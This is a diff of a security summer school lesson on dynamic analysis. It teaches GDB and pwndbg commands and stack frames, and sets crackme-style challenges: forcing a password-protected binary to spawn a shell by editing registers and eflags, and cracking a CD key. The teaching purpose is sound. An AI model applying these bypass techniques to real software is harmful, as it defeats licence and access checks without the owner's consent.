-   0x080483e4 <+26>:    mov eax,0x0
-   0x080483e9 <+31>:    leave
-   0x080483ea <+32>:    ret
-End of assembler dump.
-pwndbg> pdis 0x080483b4
-Dump of assembler code for function add:
-   0x080483b4 <+0>:     push ebp #save the old frame pointer
-   0x080483b5 <+1>:     mov ebp,esp #create a new frame pointer
-   0x080483b7 <+3>:     sub esp,0x10 #create space for local variables
-   0x080483ba <+6>:     mov eax,DWORD PTR [ebp+0xc] #move the second parameter (b) into the EAX register (ebp+saved_ebp(4 bytes)+return_address(4 bytes)+first_parameter(4 bytes))
-   0x080483bd <+9>:     mov edx,DWORD PTR [ebp+0x8] #move the first parameter (a) into the EDX register (ebp+saved_ebp(4 bytes)+return_address(4 bytes))
-   0x080483c0 <+12>:    add eax,edx #add the registers
-   0x080483c2 <+14>:    mov DWORD PTR [ebp-0x4],eax #place the result inside the local variable (c)
-   0x080483c5 <+17>:    mov eax,DWORD PTR [ebp-0x4] #place the result inside the eax register in order to return it
-   0x080483c8 <+20>:    leave
-   0x080483c9 <+21>:    ret
-End of assembler dump.
-```
-
-As you can see the parameters were pushed in reverse order, and the rule regarding the reference to EBP holds.
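The layout seen from inside `add` can be reproduced with a toy model of the stack. The sketch below is written in Python and is only an illustration, not an emulator: the `Stack` class, the `call_add` helper and the starting ESP value are assumptions made for this example, and the parameters are pushed one by one even though the compiled `main` above stores them with `mov` into space it has already reserved (the resulting layout is the same).

```python
WORD = 4  # size of one stack slot on 32-bit x86


class Stack:
    """Toy model of a downward-growing stack (hypothetical helper)."""

    def __init__(self, esp: int):
        self.esp = esp
        self.ebp = 0
        self.mem = {}  # address -> value stored in that slot

    def push(self, value) -> None:
        self.esp -= WORD  # the stack grows towards lower addresses
        self.mem[self.esp] = value


def call_add(a: int, b: int, start_esp: int = 0xFFFFCF70) -> Stack:
    """Replay the stack operations of add(a, b) under the cdecl convention."""
    s = Stack(start_esp)
    # Caller: parameters are placed in reverse order.
    s.push(b)
    s.push(a)
    # `call` pushes the return address before jumping to the callee.
    s.push("return address")
    # Callee prologue.
    s.push("saved ebp")  # push ebp
    s.ebp = s.esp        # mov ebp, esp
    s.esp -= 0x10        # sub esp, 0x10 (space for local variables)
    # Body: c = a + b, with c stored at [ebp-0x4].
    s.mem[s.ebp - 0x4] = s.mem[s.ebp + 0x8] + s.mem[s.ebp + 0xC]
    return s


if __name__ == "__main__":
    frame = call_add(10, 3)
    # Walk the frame from the last parameter down to the local variable.
    for offset in (0xC, 0x8, 0x4, 0x0, -0x4):
        print(f"[ebp{offset:+#x}] = {frame.mem[frame.ebp + offset]}")
```

In this model the first parameter ends up at `[ebp+0x8]` and the second at `[ebp+0xc]`, while the local variable sits at `[ebp-0x4]`. The two slots between EBP and the first parameter hold the saved EBP and the return address.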
-
-If you don't understand why the offset for the parameters starts at EBP+0x08 and not at EBP, follow through with the next section.
-
-### Calling functions (call and ret)
-
-When a function is called, the `call` instruction executed by the caller places the return address on the stack.
-This address is nothing more than a bookmark so that execution can resume where it left off once the called function finishes execution.
-
-The last instruction in a function is usually a `ret` instruction, which resumes execution in the caller.
-
-For a better understanding of function calling and returning, from an execution flow point of view, please follow through with the following tip.
-
-The `call` instruction could be translated to the following instructions (at that point EIP already holds the address of the instruction that follows the `call`):
-
-- `push eip`
-- `mov eip, address_of_called_function`
-
-The `ret` instruction could be translated into `pop eip`.
-
-The visual depiction of how the stack looks while a program is executing can be found in section 2 but will be included here as well:
-
-

- -
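The `call`/`ret` translation described above can be checked with a small model. What follows is a minimal sketch in C, not processor or GDB code: `toy_cpu`, `toy_call` and `toy_ret` are hypothetical names introduced only for illustration, the stack is modelled as an array of 32-bit slots that grows towards lower indices, and the length of the `call` instruction is assumed to be supplied by the user of the model.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical toy machine: a small stack that grows towards lower indices. */
enum { STACK_SLOTS = 16 };

typedef struct {
    uint32_t stack[STACK_SLOTS];
    int sp;        /* index of the top of the stack; STACK_SLOTS means empty */
    uint32_t eip;  /* address of the instruction currently being executed */
} toy_cpu;

void toy_init(toy_cpu *cpu, uint32_t entry)
{
    cpu->sp = STACK_SLOTS;
    cpu->eip = entry;
}

void toy_push(toy_cpu *cpu, uint32_t value)
{
    assert(cpu->sp > 0);            /* the model refuses to overflow its stack */
    cpu->stack[--cpu->sp] = value;
}

uint32_t toy_pop(toy_cpu *cpu)
{
    assert(cpu->sp < STACK_SLOTS);  /* the model refuses to pop an empty stack */
    return cpu->stack[cpu->sp++];
}

/* call: push the address of the instruction after the call, then jump. */
void toy_call(toy_cpu *cpu, uint32_t target, uint32_t call_length)
{
    toy_push(cpu, cpu->eip + call_length);
    cpu->eip = target;
}

/* ret: pop the saved return address back into eip. */
void toy_ret(toy_cpu *cpu)
{
    cpu->eip = toy_pop(cpu);
}
```

Using the addresses from the `main` listing earlier in this section: starting with `eip` at `0x080483df` and running `toy_call(&cpu, 0x080483b4, 5)` leaves `0x080483e4` on top of the stack, and `toy_ret(&cpu)` then puts that value back into `eip`.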

-
-### Next Section Preview: Buffer Overflows
-
-Now that we have a complete overview of the stack we can step forward to stack based buffer overflows.
-
-A buffer overflow takes place when a program writes past the end of a buffer because boundaries are not checked, and it often results in complete control of the program's instruction pointer.
-This happens when the data that overflows the buffer overwrites the return address of a function.
-
-A typical example of buffer overflows can be seen in the following picture:
-
-

- -
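The overwrite described above can be illustrated without actually corrupting a real stack. The sketch below is a model under stated assumptions: `toy_frame` and its layout (an 8-byte buffer directly below a 4-byte saved EBP and a 4-byte return address) are hypothetical, and real compilers may add padding or stack protectors between these fields.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical frame layout, lowest address first:
 * 8-byte local buffer, 4-byte saved EBP, 4-byte return address. */
enum { BUF_SIZE = 8, SAVED_EBP_OFF = 8, RET_ADDR_OFF = 12, FRAME_SIZE = 16 };

typedef struct {
    unsigned char bytes[FRAME_SIZE];
} toy_frame;

void frame_init(toy_frame *f, uint32_t saved_ebp, uint32_t ret_addr)
{
    memset(f->bytes, 0, FRAME_SIZE);
    memcpy(f->bytes + SAVED_EBP_OFF, &saved_ebp, sizeof saved_ebp);
    memcpy(f->bytes + RET_ADDR_OFF, &ret_addr, sizeof ret_addr);
}

uint32_t frame_ret_addr(const toy_frame *f)
{
    uint32_t value;
    memcpy(&value, f->bytes + RET_ADDR_OFF, sizeof value);
    return value;
}

/* Copies n bytes to the start of the buffer without comparing n to BUF_SIZE,
 * which is the missing boundary check. The assert only keeps the model
 * itself inside its own array. */
void unchecked_copy(toy_frame *f, const unsigned char *src, size_t n)
{
    assert(n <= FRAME_SIZE);
    memcpy(f->bytes, src, n);
}
```

Copying 8 bytes of `'A'` leaves the modelled return address untouched, while copying 16 bytes replaces it with `0x41414141`, the value that would end up in EIP when the function returns.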

-
-
-## Challenges
-
-Use GDB and pwndbg to run the code provided in the Activities section.
-
-### 01. Challenge - Explore The Simple Password Protected Bash
-
-The executable gets input from the user and evaluates it against a static condition.
-If it succeeds it then calls a `password_accepted` function that prints out a success message and spawns a shell.
-
-Your task is to use GDB and pwndbg to force the executable to call the `password_accepted` function.
-
-Gather as much info about the executable as possible through the techniques you have learned in previous sessions.
-
-Think of modifying registers for forcing the executable to call the function (there is more than one way of doing this).
-
-### 02. Challenge - Simple Password Protected Bash Destruction
-
-What is the condition against which your input is evaluated in the `sppb` executable?
-
-The ultimate goal is to be able to craft an input for the binary so that the `password_accepted` function is called (modifying registers while running the program in GDB is just for training purposes).
-
-### 03. Challenge - Domino
-
-Analyze the binary, reverse engineer what it does and get a nice message
-back.
-
-### 04. Challenge - Call me
-
-Investigate the binary in `04-challenge-call-me/src/call_me` and find out the flag.
-
-Hint: There is something hidden you can toy around with.
-
-Hint: The challenge name is a hint.
-
-### 05. Challenge - Snooze Me
-
-I wrote a simple binary that computes the answer to life, the universe and everything.
-I swear it works... eventually.
-
-### 06. Challenge - Phone Home
-
-To protect their confidential data from those snooping cloud providers, the authors of `06-challenge-phone-home/src/phone_home` have used some obfuscation techniques.
-
-Unfortunately, the key feature of the application is now unreachable due to a bug.
-Can you bypass the impossible condition?
-
-### 07. Challenge - Chain encoder
-
-How do you reverse something made to be irreversible? You are welcome to find out in this challenge.
-
-### 08. Challenge - Simple cdkey
-
-I found this software but I don't have the CD key, can you crack it for me?
+# Dynamic Analysis
+
+## Introduction
+
+### Objectives & Rationale
+
+The first part of this session will give you a walkthrough of the most common GDB principles that we are going to use in exploitation.
+In the second half, we are going to use these concepts in practice, to evade a basic key evaluation program.
+
+Black box analysis works best when standard algorithms are used in the program, such as MD5, SHA1 or RSA.
+We can change the input to a more suggestive one and use the output to estimate what function was used to convert it.
+
+Combined with behavioral analysis methods such as using sandboxes or `strace`/`ltrace`, we can quickly map sections of code to functionalities.
+
+With dynamic analysis, packed malware can be extracted from memory in unpacked form, enabling us to continue static analysis on the complete binary.
+
+### Prerequisites
+
+In the current session we will use GDB extensively.
+We assume that you are familiar with its basic usage and will move on quickly to some of its more advanced features.
+
+To brush up on the GDB basics, read this [Refresher](https://security.cs.pub.ro/summer-school/wiki/session/04-gdb "session:04-gdb").
+
+The executable used in the demo is called `sppb` and is the challenge 1 binary.
+
+### Before GDB
+
+One thing you should always do before firing up GDB is to try to learn all the available information on the executable you're trying to debug through the techniques that have been presented so far.
+
+For the purposes of this session it is a good idea to always run `objdump` on all the executable files before attaching GDB to them so that you have a better idea of what goes where.
+ +```console +objdump -M intel -d [executable] +``` + +## GDB Basic Commands + +### Getting help with GDB + +Whenever you want to find out more information about GDB commands feel free to search for it inside [the documentation](http://www.gnu.org/software/gdb/documentation/ "http://www.gnu.org/software/gdb/documentation/") or by using the `help` command followed by your area of interest. +For example searching for help for the `disassemble` command can be obtained by running the following command in GDB: + +```text +# Print info about all help areas available. +# Identify the area of your question. +(gdb) help + +# Print info about available data commands. +# Identify the command you want to learn more about. +(gdb) help data + +# Print info about a specific command. +# Find out more about the command you are searching for. +(gdb) help disassemble +``` + +### Opening a program with GDB + +A program can be opened for debugging in a number of ways. +We can run GDB directly attaching it to a program: + +```console +gdb [executable-file] +``` + +Or we can open up GDB and then specify the program we are trying to attach to using the file or file-exec command: + +```console +$ gdb +(gdb) file [executable-file] +``` + +Furthermore we can attach GDB to a running service if we know its process id: + +```text +gdb --pid [pid_number] +``` + +### Disassembling + +GDB allows disassembling of binary code using the `disassemble` command +(it may be shortened to `disas`). +The command can be issued either on a +memory address or using labels. + +```text +(gdb) disassemble *main +Dump of assembler code for function main: + 0x080491c9 <+0>: push ebp + 0x080491ca <+1>: mov ebp,esp + 0x080491cc <+3>: push ebx + 0x080491cd <+4>: sub esp,0x4 +=> 0x080491d0 <+7>: mov eax,ds:0x804c030 +....Output ommited..... 
+ +(gdb) disassemble 0x080491c9 +Dump of assembler code for function main: + 0x080491c9 <+0>: push ebp + 0x080491ca <+1>: mov ebp,esp + 0x080491cc <+3>: push ebx + 0x080491cd <+4>: sub esp,0x4 +=> 0x080491d0 <+7>: mov eax,ds:0x804c030 +``` + +### Adding Breakpoints + +Breakpoints are important to suspend the execution of the program being debugged in a certain place. +Adding breakpoints is done with the `break` command. +A good idea is to place a breakpoint at the main function of the program you are trying to exploit. +Given the fact that you have already run `objdump` and disassembled the program you know the address for the start of the main function. +This means that we can set a breakpoint for the start of our program in two ways: + +```text +(gdb) break *main (when the binary is not stripped of symbols) +(gdb) break *0x[main_address_obtained_with_objdump] (when aslr is off) +``` + +The general format for setting breakpoints in GDB is as follows: + +```text +(gdb) break [LOCATION] [thread THREADNUM] [if CONDITION] +``` + +Issuing the `break` command with no parameters will place a breakpoint at the current address. +GDB allows using abbreviated forms for all the commands it supports. +Learning these abbreviations comes with time and will greatly improve you work output. +Always be on the lookout for using abbreviated commands + +The abbreviated command for setting breakpoints is simply `b`. + +### Listing Breakpoints + +At any given time all the breakpoints in the program can be displayed using the `info breakpoints` command: + +```text +(gdb) info breakpoints +``` + +You can also issue the abbreviated form of the command + +```text +(gdb) i b +``` + +### Deleting Breakpoints + +Breakpoints can be removed by issuing the `delete breakpoints` command followed by the breakpoints number, as it is listed in the output of the +`info breakpoints` command. 
+ +```text +(gdb) delete breakpoints [breakpoint_number] +``` + +You can also delete all active breakpoints by issuing the following the `delete breakpoints` command with no parameters: + +```text +(gdb) delete breakpoints +``` + +Once a breakpoint is set you would normally want to launch the program into execution. +You can do this by issuing the `run` command. +The program will start executing and stop at the first breakpoint you have set. + +```text +(gdb) run +``` + +#### Execution Flow + +Execution flow can be controlled in GDB using the `continue`, `stepi`,`nexti` as follows: + +```text +(gdb) help continue +# Continue program being debugged, after signal or breakpoint. +# If proceeding from breakpoint, a number N may be used as an argument, +# which means to set the ignore count of that breakpoint to N - 1 (so that the breakpoint won't break until the Nth time it is reached). + +(gdb) help stepi +# Step one instruction exactly. +# Argument N means do this N times (or till program stops for another reason). + +(gdb) help nexti +# Step one instruction, but proceed through subroutine calls. +# Argument N means do this N times (or till program stops for another reason). +``` + +You can also use the abbreviated format of the commands: `c` (`continue`), `si` (`stepi`), `ni` (`nexti`). + +If at any point you want to start the program execution from the beginning you can always reissue the `run` command. + +Another technique that can be used for setting breakpoints is using offsets. + +As you already know, each assembly instruction takes a certain number of bytes inside the executable file. +This means that whenever you are setting breakpoints using offsets you must always set them at instruction boundaries. 
+ +```text +(gdb) break *main +Breakpoint 1 at 0x80491d0 +(gdb) run +Starting program: sppb + +Breakpoint 1, 0x80491d0 in main () +(gdb) disassemble main +Dump of assembler code for function main: + 0x080491c9 <+0>: push ebp + 0x080491ca <+1>: mov ebp,esp + 0x080491cc <+3>: push ebx + 0x080491cd <+4>: sub esp,0x4 +.....Output ommited..... +(gdb) break *main+4 +Breakpoint 2 at 0x80491cd +``` + +### Examine and Print, Your Most Powerful Tools + +GDB allows examining of memory locations be them specified as addresses or stored in registers. +The `x` command (for *examine*) is arguably one of the most powerful tool in your arsenal and the most common command you are going to run when exploiting. +The format for the `examine` command is as follows: + +```text +(gdb) x/nfu [address] + n: How many units to print + f: Format character + a Pointer + c Read as integer, print as character + d Integer, signed decimal + f Floating point number + o Integer, print as octal + s Treat as C string (read all successive memory addresses until null character and print as characters) + t Integer, print as binary (t="two") + u Integer, unsigned decimal + x Integer, print as hexadecimal + u: Unit + b: Byte + h: Half-word (2 bytes) + w: Word (4 bytes) + g: Giant word (8 bytes) + i: Instruction (read n assembly instructions from the specified memory address) +``` + +In contrast with the examine command, which reads data at a memory location the `print` command (shorthand `p`) prints out values stored in registers and variables. 
+The format for the `print` command is as follows: + +```text +(gdb) p/f [what] + f: Format character + a Pointer + c Read as integer, print as character + d Integer, signed decimal + f Floating point number + o Integer, print as octal + s Treat as C string (read all successive memory addresses until null character and print as characters) + t Integer, print as binary (t="two") + u Integer, unsigned decimal + x Integer, print as hexadecimal + i Instruction (read n assembly instructions from the specified memory address) +``` + +For a better explanation please follow through with the following example: + +```text +# A breakpoint has been set inside the program and the program has been run with the appropriate commands to reach the breakpoint. +# At this point we want to see which are the following 10 instructions. +(gdb) x/10i 0x80491cd + 0x80491cd : sub esp,0x4 + 0x80491d0 : mov eax,ds:0x804c030 + 0x80491d5 : push 0x0 + 0x80491d7 : push 0x1 + 0x80491d9 : push 0x0 + 0x80491db : push eax + 0x80491dc : call 0x8049080 + +# Let's examine the memory at 0x804a02a because we have a hint that this address holds one of the parameters of the scanf call as it is afterwards placed on the stack (we'll explain later how we have reached this conclusion). +# The other parameter will be an address where the input will be stored. +(gdb) x/s 0x804a02a +0x804a02a: "%d" + +# We now set a breakpoint for *main+56. +(gdb) break *0x08049201 +Breakpoint 3 at 0x08049201 +(gdb) continue +Continuing. + +Breakpoint 3, 0x08049201 in main () + +# We then record the value of the eax register somewhere and use nexti(ni) and then we input an integer. +# Let's examine the address which we recorded earlier corresponding to the eax register (it should've held the address for the integer we input). +# Take note that in GDB registers are preceded by the "$" character very much like variables. 
+(gdb) x/d 0xffffcf70 <- (your address) +0xffffcf70: +# Now let's print the contents of the eax register as hexadecimal. +(gdb) p/x $eax +$1 = + +# The diference between p and x can be observed by issuing the following commands: +x/s 0x804a030 +0x804a030: "Your password is: %d. Evaluating it...\n" + +p /s 0x804a030 + +# $2 = 1920298841 which is the number in decimal format that "Your" can be translated to by its ascii codes (little endian so written as 0x72756F59). + +# In order to see the same result we must use the command p /s (char*)0x804a030 and dereference the pointer ourselves. +# As you can see the address holds the memory for the beginning of the string. +# This shows you how "x" interprets data from memory while "p" merely prints out the contents in the required format +# You can think of it as "x" dereferencing while "p" not dereferencing +``` + +### GDB Command file + +When exploiting, there are a couple of commands that you will issue periodically and doing that by hand will get cumbersome. +GDB commands files will allow you to run a specific set of commands automatically after each command you issue manually. +This comes in especially handy when you're stepping through a program and want to see what happens with the registers and stack after each instruction is ran, which is the main target when exploiting. + +The examine command only has sense when code is already running on the machine so inside the file we are going to use the display command which translates to the same output. + +In order to use this option you must first create your commands file. +This file can include any GDB commands you like but a good start would be printing out the content of all the register values, the next ten instructions that are going to be executed, and some portion from the top of the stack. + +The reason for examining all of the above after each instruction is ran will become more clear once the we go through the second section of the session. 
+ +Command file template: + +```text +display/10i $eip +display/x $eax +display/x $ebx +display/x $ecx +display/x $edx +display/x $edi +display/x $esi +display/x $ebp +display/32xw $esp +``` + +In order to view all register values you could use the `x` command. +However the values of all registers can be obtained by running the`info all-registers` command: + +```text +(gdb) info all-registers +eax 0x8048630,134514224 +ecx 0xbffff404,-1073744892 +edx 0xbffff394,-1073745004 +ebx 0xb7fc6ff4,-1208193036 +esp 0xbffff330,0xbffff330 +ebp 0xbffff368,0xbffff368 +esi 0x0,0 +edi 0x0,0 +eip 0x80484e9,0x80484e9 +eflags 0x286,[ PF SF IF ] +cs 0x73,115 +ss 0x7b,123 +ds 0x7b,123 +es 0x7b,123 +fs 0x0,0 +gs 0x33,51 +st0 *value not available* +st1 *value not available* +st2 *value not available* +st3 *value not available* +st4 *value not available* +st5 *value not available* +st6 *value not available* +st7 *value not available* +fctrl 0x37f,895 +fstat 0x0,0 +ftag 0xffff,65535 +fiseg 0x0,0 +fioff 0x0,0 +foseg 0x0,0 +---Type to continue, or q to quit--- +fooff 0x0,0 +fop 0x0,0 +mxcsr 0x1f80,[ IM DM ZM OM UM PM ] +ymm0 *value not available* +ymm1 *value not available* +ymm2 *value not available* +ymm3 *value not available* +ymm4 *value not available* +ymm5 *value not available* +ymm6 *value not available* +ymm7 *value not available* +mm0 *value not available* +mm1 *value not available* +mm2 *value not available* +mm3 *value not available* +mm4 *value not available* +mm5 *value not available* +mm6 *value not available* +mm7 *value not available* +``` + +One thing you might notice while using GDB is that addresses seem to be pretty similar between runs. +Although with experience you will gain a better feel for where an address points to, one thing to remember at this point would be that stack addresses usually have the `0xbffff….` format. +In order to run GDB with the commands file you have just generated, when launching GDB specify the `-x [command_file]` parameter. 
+
+### Using GDB to modify variables
+
+GDB can be used to modify variables during runtime.
+In the case of exploitation this comes in handy as the program can be altered at runtime with the purpose of changing the execution path to desired branches.
+
+## Pwndbg
+
+As you can see, using plain GDB can be cumbersome, which is why we recommend using the pwndbg plug-in.
+The tutorial as well as the repository of the project can be found here: [Pwndbg](https://github.com/pwndbg/pwndbg "https://github.com/pwndbg/pwndbg").
+
+Given the fact that pwndbg is just a wrapper, all the functionality of GDB will be available when running gdb with the `pwndbg` plug-in.
+Some of the advantages of using pwndbg include:
+
+- Automatic preview of registers, code and stack after each instruction (you no longer need to create your own commands file)
+- Automatic dereferencing and following through of memory locations
+- Color coding
+
+An alternative to pwndbg is [Gef](https://github.com/hugsy/gef "https://github.com/hugsy/gef").
+However, this tutorial is designed with Pwndbg in mind.
+ +#### Pwndbg Commands + +`pdis` command gives a pretty output that is similar to what the `disas` command in GDB prints: + +```text +Usage: pdis 0x80491d0 +``` + +If `pdis` is used with an address as a parameter, the output will be similar to what `x/Ni` prints out (where N is the number of instructions you want to disassemble) Usage: -pdis \[address\] [N] - where N is the number of instructions you want to be printed + +The `stepi` command has the same effect as in GDB however, if you are running Pwndbg you will notice that after each step Pwndbg will automatically print register values, several lines of code from eip +register and a portion of the stack: + +```text +pwndbg> stepi + +LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA +────────────────────────────────────[ REGISTERS ]──────────────────────────────────── +*EAX 0xf7facd20 (_IO_2_1_stdout_) ◂— 0xfbad2084 + EBX 0x0 + ECX 0xa00af61b + EDX 0xffffcfb4 ◂— 0x0 + EDI 0xf7fac000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1e9d6c + ESI 0xf7fac000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1e9d6c + EBP 0xffffcf78 ◂— 0x0 + ESP 0xffffcf70 —▸ 0xf7fac000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1e9d6c +*EIP 0x80491d5 (main+12) ◂— push 0 /* 'j' */ +─────────────────────────────────────[ DISASM ]────────────────────────────────────── + 0x80491d0 mov eax, dword ptr [stdout@GLIBC_2.0] <0x804c030> + ► 0x80491d5 push 0 + 0x80491d7 push 1 + 0x80491d9 push 0 + 0x80491db push eax + 0x80491dc call setvbuf@plt + + 0x80491e1 add esp, 0x10 + 0x80491e4 mov dword ptr [ebp - 8], 0 + 0x80491eb push 0x804a010 + 0x80491f0 call puts@plt + + 0x80491f5 add esp, 4 +──────────────────────────────────[ SOURCE (CODE) ]────────────────────────────────── +In file: /home/kali/Desktop/dokermaker/binary-internal/sessions/05-dynamic-analysis/activities/01-02-challenge-sppb/src/sppb.c + 6 execve("/bin/sh", 0, 0); + 7 } + 8 + 9 int main() + 10 { + ► 11 setvbuf(stdout, NULL, _IOLBF, 0); + 12 int readValue = 0; + 13 + 14 printf("Please provide password: \n"); + 15 scanf("%d", &readValue); 
+ 16 +──────────────────────────────────────[ STACK ]────────────────────────────────────── +00:0000│ esp 0xffffcf70 —▸ 0xf7fac000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1e9d6c +01:0004│ 0xffffcf74 ◂— 0x0 +02:0008│ ebp 0xffffcf78 ◂— 0x0 +03:000c│ 0xffffcf7c —▸ 0xf7de0fd6 (__libc_start_main+262) ◂— add esp, 0x10 +04:0010│ 0xffffcf80 ◂— 0x1 +05:0014│ 0xffffcf84 —▸ 0xffffd024 —▸ 0xffffd1d9 ◂— '/home/kali/Desktop/sppb' +06:0018│ 0xffffcf88 —▸ 0xffffd02c —▸ 0xffffd24d ◂— 'COLORFGBG=15;0' +07:001c│ 0xffffcf8c —▸ 0xffffcfb4 ◂— 0x0 +────────────────────────────────────[ BACKTRACE ]──────────────────────────────────── + ► f 0 0x80491d5 main+12 + f 1 0xf7de0fd6 __libc_start_main+262 + +``` + +You can always use the following commands to obtain context at any given moment inside the debug process: + +- `context reg` +- `context code` +- `context stack` +- `context all` + +One additional Pwndbg command which can be used to show values in registers is the `telescope` command. +The command dereferentiates pointer values until it gets to a value and prints out the entire trace. + +The command can be used with both registers and memory addresses: + +```text +pwndbg$ telescope $esp +00:0000│ esp 0xffffcf70 —▸ 0xf7fac000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1e9d6c +01:0004│ 0xffffcf74 ◂— 0x0 +02:0008│ ebp 0xffffcf78 ◂— 0x0 +03:000c│ 0xffffcf7c —▸ 0xf7de0fd6 (__libc_start_main+262) ◂— add esp, 0x10 +04:0010│ 0xffffcf80 ◂— 0x1 +05:0014│ 0xffffcf84 —▸ 0xffffd024 —▸ 0xffffd1d9 ◂— '/home/kali/Desktop/sppb' +06:0018│ 0xffffcf88 —▸ 0xffffd02c —▸ 0xffffd24d ◂— 'COLORFGBG=15;0' +07:001c│ 0xffffcf8c —▸ 0xffffcfb4 ◂— 0x0 +pwndbg> telescope 0xffffcf84 +00:0000│ 0xffffcf84 —▸ 0xffffd024 —▸ 0xffffd1d9 ◂— '/home/kali/Desktop/sppb' +01:0004│ 0xffffcf88 —▸ 0xffffd02c —▸ 0xffffd24d ◂— 'COLORFGBG=15;0' +02:0008│ 0xffffcf8c —▸ 0xffffcfb4 ◂— 0x0 +03:000c│ 0xffffcf90 —▸ 0xffffcfc4 ◂— 0xe38ae80b +04:0010│ 0xffffcf94 —▸ 0xf7ffdb60 —▸ 0xf7ffdb00 —▸ 0xf7fc93e0 —▸ 0xf7ffd9a0 ◂— ... 
+05:0014│ 0xffffcf98 —▸ 0xf7fc9410 —▸ 0x804832d ◂— 'GLIBC_2.0' +06:0018│ 0xffffcf9c —▸ 0xf7fac000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1e9d6c +07:001c│ 0xffffcfa0 ◂— 0x1 +``` + +In the example above, the memory address 0x8048630 was loaded into EAX. +That is why examining the register or the memory location gives the same output. + +For more information on various Pwndbg commands you can always visit the Pwndbg help through the `pwndbg` command It is always a better idea to use Pwndbg commands when available. +However you should also know the basics of using GDB as well. + +#### Altering variables and memory with Pwndbg and GDB + +In addition to basic registers, GDB has a two extra variables which map onto some of the existing registers, as follows: + +- `$pc - $eip` +- `$sp - $esp` +- `$fp - $ebp` + +In addition to these there are also two registers which can be used to view the processor state `$ps - processor status` + +Values of memory addresses and registers can be altered at execution time. +Because altering memory is a lot easier using Pwndbg we are going to use it throughout today's session. + +The easiest way of altering the execution flow of a program is editing the `$eflags` register just before jump instructions. + +Using GDB the `$eflags` register can be easily modified: + +```text +pwndbg> reg eflags +EFLAGS 0x282 [ cf pf af zf SF IF df of ] +Set the ZF flag +pwndbg> set $eflags |= (1 << 6) +Clear the ZF flag +pwndbg> set $eflags &= ~(1 << 6) +``` + +Notice that the flags that are set are printed in all-caps when the`reg eflags` command is issued. + +The `set` command (GDB native) can be used to modify values that reside inside memory. 
+
+```text
+pwndbg> telescope 0x804a010
+00:0000│ 0x804a010 ◂— 'Please provide password: '
+01:0004│ 0x804a014 ◂— 'se provide password: '
+02:0008│ 0x804a018 ◂— 'rovide password: '
+03:000c│ 0x804a01c ◂— 'de password: '
+04:0010│ 0x804a020 ◂— 'assword: '
+05:0014│ 0x804a024 ◂— 'ord: '
+06:0018│ 0x804a028 ◂— 0x64250020 /* ' ' */
+07:001c│ 0x804a02c ◂— 0x0
+
+pwndbg> set {char [14]} 0x804a010 = "No pass here"
+pwndbg> telescope 0x804a010
+00:0000│ 0x804a010 ◂— 'No pass here'
+01:0004│ 0x804a014 ◂— 'ass here'
+02:0008│ 0x804a018 ◂— 'here'
+03:000c│ 0x804a01c ◂— 0x70200000
+04:0010│ 0x804a020 ◂— 'assword: '
+05:0014│ 0x804a024 ◂— 'ord: '
+06:0018│ 0x804a028 ◂— 0x64250020 /* ' ' */
+07:001c│ 0x804a02c ◂— 0x0
+```
+
+As you can see, the string residing in memory at address `0x804a010` has been modified using the `set` command.
+
+Pwndbg does not offer enhancements in modifying register values.
+For modifying register values you can use the GDB `set` command.
+
+```text
+pwndbg> p/x $eax
+$10 = 0x1
+pwndbg> set $eax=0x80
+pwndbg> p/x $eax
+$11 = 0x80
+```
+
+## The Stack
+
+This section describes the process of function calling in detail.
+Understanding function calling and stack operations during program execution is essential to exploitation.
+
+The stack is one of the areas of memory which gets the biggest attention in exploit writing.
+
+### Stack Growth
+
+The stack grows from high memory addresses to low memory addresses.
+
+```text
+pwndbg> pdis $eip
+
+   0x80491db    push eax
+   0x80491dc    call setvbuf@plt
+
+   0x80491e1    add esp, 0x10
+   0x80491e4    mov dword ptr [ebp - 8], 0
+   0x80491eb    push 0x804a010
+ ► 0x80491f0    call puts@plt
+
+pwndbg> p/x $esp
+$1 = 0xffffcf6c
+pwndbg> si
+0x8049050 in puts@plt ()
+pwndbg> p/x $esp
+$5 = 0xffffcf68
+```
+
+As you can see from the example above, the `$esp` register had an initial value of `0xffffcf6c`.
+The next instruction that is about to be executed is a `call`, which pushes the 4-byte return address (`0x80491f5`, the address of the instruction after the `call`) on the stack.
+We execute the instruction and then reevaluate the value of `$esp`. +As we can see `$esp` now points to `0xffffcf68` (`0xffffcf6c-0x4`). + +### Frame Pointers and Local Function Variables + +Whenever the processor is entering the execution for a function, a special logical container is created on the stack for that function. + +This container is called a function frame. +The idea behind it is that the processor must know which area of the stack belongs to which function. + +In order to achieve this logical segmentation a set of 2 instructions are automatically inserted by the compiler at the beginning of each function. +Can you tell what they are based on the output below? + +```text +pwndbg> break main +Breakpoint 1 at 0x80484c8 +pwndbg> run +[----------------------------------registers-----------------------------------] + EAX 0xf7fa99e8 (environ) —▸ 0xffffd02c —▸ 0xffffd24d ◂— 'COLORFGBG=15;0' + EBX 0x0 + ECX 0xb8a6a751 + EDX 0xffffcfb4 ◂— 0x0 + EDI 0x80490a0 (_start) ◂— xor ebp, ebp + ESI 0x1 + EBP 0xffffcf78 ◂— 0x0 + ESP 0xffffcf70 ◂— 0x1 + EIP 0x80491d0 (main+7) ◂— mov eax, dword ptr [0x804c030] +[-------------------------------------code-------------------------------------] + 0x080491c9 <+0>: push ebp + 0x080491ca <+1>: mov ebp,esp + 0x080491cc <+3>: push ebx + 0x080491cd <+4>: sub esp,0x4 +=> 0x080491d0 <+7>: mov eax,ds:0x804c030 + 0x080491d5 <+12>: push 0x0 + 0x080491d7 <+14>: push 0x1 + 0x080491d9 <+16>: push 0x0 + 0x080491db <+18>: push eax + +[------------------------------------stack-------------------------------------] +00:0000│ esp 0xffffcf70 ◂— 0x1 +01:0004│ 0xffffcf74 ◂— 0x0 +02:0008│ ebp 0xffffcf78 ◂— 0x0 +03:000c│ 0xffffcf7c —▸ 0xf7dda905 (__libc_start_main+229) ◂— add esp, 0x10 +04:0010│ 0xffffcf80 ◂— 0x1 +05:0014│ 0xffffcf84 —▸ 0xffffd024 —▸ 0xffffd1d9 ◂— '/home/kali/Desktop/sppb' +06:0018│ 0xffffcf88 —▸ 0xffffd02c —▸ 0xffffd24d ◂— 